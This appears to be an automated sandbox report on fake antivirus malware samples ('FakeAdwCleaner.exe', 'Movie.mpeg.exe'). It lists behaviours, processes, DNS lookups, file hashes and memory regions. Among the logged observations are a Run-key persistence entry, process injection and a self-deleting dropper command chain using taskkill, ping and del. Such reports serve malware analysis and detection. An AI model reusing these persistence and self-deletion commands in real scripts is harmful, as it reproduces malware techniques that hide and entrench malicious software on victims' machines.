Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

Network

Country Destination Domain Proto
US 138.91.171.81:80 tcp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 www.vikingwebscanner.com udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 52.111.229.19:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

MD5 87e4959fefec297ebbf42de79b5c88f6
SHA1 eba50d6b266b527025cd624003799bdda9a6bc86
SHA256 4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61
SHA512 232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9

memory/932-11-0x0000000000640000-0x000000000066E000-memory.dmp

memory/932-12-0x00007FFF99910000-0x00007FFF9A3D1000-memory.dmp

memory/932-13-0x000000001B320000-0x000000001B330000-memory.dmp

memory/932-14-0x000000001B320000-0x000000001B330000-memory.dmp

memory/932-15-0x000000001B320000-0x000000001B330000-memory.dmp

memory/932-16-0x00007FFF99910000-0x00007FFF9A3D1000-memory.dmp

memory/932-17-0x000000001B320000-0x000000001B330000-memory.dmp

memory/932-18-0x000000001B320000-0x000000001B330000-memory.dmp

memory/932-19-0x000000001B320000-0x000000001B330000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240215-en

Max time kernel

149s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\goujfbdq.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1256 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe C:\Windows\SysWOW64\cmd.exe
PID 1304 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1304 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1304 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1304 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1304 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1304 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1304 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1304 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1304 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\goujfbdq.exe
PID 1304 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\goujfbdq.exe
PID 1304 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\goujfbdq.exe
PID 1304 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\goujfbdq.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /f /pid 1256 & ping -n 3 127.1 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe" & start C:\Users\Admin\AppData\Local\goujfbdq.exe -f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /pid 1256

C:\Windows\SysWOW64\PING.EXE

ping -n 3 127.1

C:\Users\Admin\AppData\Local\goujfbdq.exe

C:\Users\Admin\AppData\Local\goujfbdq.exe -f

Network

N/A

Files

memory/1256-0-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1256-1-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/1256-2-0x0000000000260000-0x0000000000262000-memory.dmp

memory/1256-4-0x0000000001000000-0x00000000010CE000-memory.dmp

\Users\Admin\AppData\Local\goujfbdq.exe

MD5 d0deb2644c9435ea701e88537787ea6e
SHA1 866e47ecd80da89c4f56557659027a3aee897132
SHA256 ad6cd46f373aadad85fab5ecdb4cb4ad7ebd0cbe44c84db5d2a2ee1b54eb5ec3
SHA512 6faac2e1003290bb3a0613ee84d5c76d3c48a4524e97975e9174d6fcfb5a6a48d6648b06ed5a4c10c3349f70efffc6a08a185fdeb0824250ae044b96ef39fcdf

memory/2600-9-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-10-0x0000000000270000-0x0000000000272000-memory.dmp

memory/2600-12-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-13-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-14-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-15-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-16-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-17-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-18-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-19-0x0000000001000000-0x00000000010CE000-memory.dmp